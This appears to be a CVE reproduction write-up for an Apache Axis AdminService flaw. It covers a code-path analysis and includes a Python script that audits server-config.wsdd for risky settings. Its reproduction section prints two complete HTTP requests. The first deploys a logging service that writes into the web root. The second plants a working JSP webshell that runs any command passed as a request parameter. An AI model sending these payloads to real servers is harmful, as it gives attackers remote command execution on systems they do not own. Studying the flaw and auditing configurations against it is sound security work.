0x01 Vulnerability background
Affected versions: version <= 1.4
CVE ID: CVE-2019-0227
0x02 Reproduction
Setup reference
https://g.yuque.com/corgi/vghqzi/nayqnl
Visit the page

Send a request to the services/AdminService endpoint. Through this endpoint other service endpoints can be created, for example ones that write files, execute commands, and so on.

poc1:
POST /TestAxis_war/services/AdminService HTTP/1.1
Host: 192.168.52.2:8088
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 1061
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<ns1:deployment
xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
xmlns:ns1="http://xml.apache.org/axis/wsdd/">
<ns1:service name="RandomService" provider="java:RPC">
<requestFlow>
<handler type="RandomLog"/>
</requestFlow>
<ns1:parameter name="className" value="java.util.Random"/>
<ns1:parameter name="allowedMethods" value="*"/>
</ns1:service>
<handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >
<parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" />
<parameter name="LogHandler.writeToConsole" value="false" />
</handler>
</ns1:deployment>
</soapenv:Body>
</soapenv:Envelope>
Then send poc2, which writes the webshell content into the jsp file
POST /TestAxis_war/services/RandomService HTTP/1.1
Host: 192.168.52.2:8088
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 847
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]></api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>


0x03 Vulnerability analysis
The application's endpoints come mainly from the configuration file server-config.wsdd, so the analysis starts from that file.

From that configuration file we go straight to org.apache.axis.utils.Admin#AdminService and set a breakpoint inside that method to debug.

Stepping into the process method, the first thing it does is check whether remote admin access is enabled. This is one of the preconditions for exploiting this vulnerability and must be turned on in the configuration file.

Continuing into the processWSDD method, the first few if checks on the action can be ignored; the important part is this block

Following saveConfiguration, it calls the operation that writes the configuration file.

Following the writeEngineConfig method, the deployment is finally written into the server-config.wsdd configuration file.

Looking at the deployment folder, the configuration has indeed been written into the configuration file.

On the second request, the call is routed to org.apache.axis.handlers.LogHandler, which writes the request as a log entry into the log file that was configured with a .jsp suffix. Because that jsp was placed under webapps/ROOT, the webshell can then be accessed directly.
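As an added example (not code from the original writeup), the following script audits a server-config.wsdd for the two conditions the analysis above depends on: remote admin enabled on AdminService, and a deployed LogHandler whose log file is not a plain .log file. It assumes the standard Axis WSDD namespace and that the remote-admin switch is the AdminService parameter enableRemoteAdmin, which the page itself does not name; the sample WSDD is constructed.

```python
"""Audit an Apache Axis 1.x server-config.wsdd for what this writeup relies on:
remote admin enabled, and a LogHandler whose log file is not a plain .log."""
import xml.etree.ElementTree as ET

LOG_HANDLER = "java:org.apache.axis.handlers.LogHandler"

# Constructed sample in the shape writeEngineConfig leaves after poc1 (assumed;
# "enableRemoteAdmin" is the Axis AdminService switch the analysis refers to).
SAMPLE_WSDD = """<?xml version="1.0"?>
<deployment xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
 <service name="AdminService" provider="java:MSG">
  <parameter name="enableRemoteAdmin" value="true"/>
 </service>
 <service name="RandomService" provider="java:RPC">
  <requestFlow><handler type="RandomLog"/></requestFlow>
  <parameter name="className" value="java.util.Random"/>
  <parameter name="allowedMethods" value="*"/>
 </service>
 <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler">
  <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp"/>
 </handler>
</deployment>"""

def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]

def _params(elem):
    """Collect the <parameter name=.. value=..> children of elem into a dict."""
    return {p.get("name"): p.get("value")
            for p in elem if _local(p.tag) == "parameter"}

def audit_wsdd(xml_text):
    """Return a list of finding strings for one server-config.wsdd document."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        kind, name, params = _local(el.tag), el.get("name"), _params(el)
        if kind == "service" and name == "AdminService":
            if params.get("enableRemoteAdmin", "false").lower() == "true":
                findings.append("AdminService: enableRemoteAdmin=true, remote deployment allowed")
        elif kind == "service" and params.get("allowedMethods") == "*":
            findings.append("%s: allowedMethods=* exposes every public method" % name)
        elif kind == "handler" and el.get("type") == LOG_HANDLER:
            fname = params.get("LogHandler.fileName", "")
            if ".." in fname or not fname.lower().endswith(".log"):
                findings.append("handler %s: LogHandler.fileName=%s is not a plain .log file"
                                % (name, fname))
    return findings
```

Run it against the real server-config.wsdd in the deployed webapp; an empty list for a stock configuration is the expected baseline.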
0x04 References
https://g.yuque.com/corgi/vghqzi/nayqnl
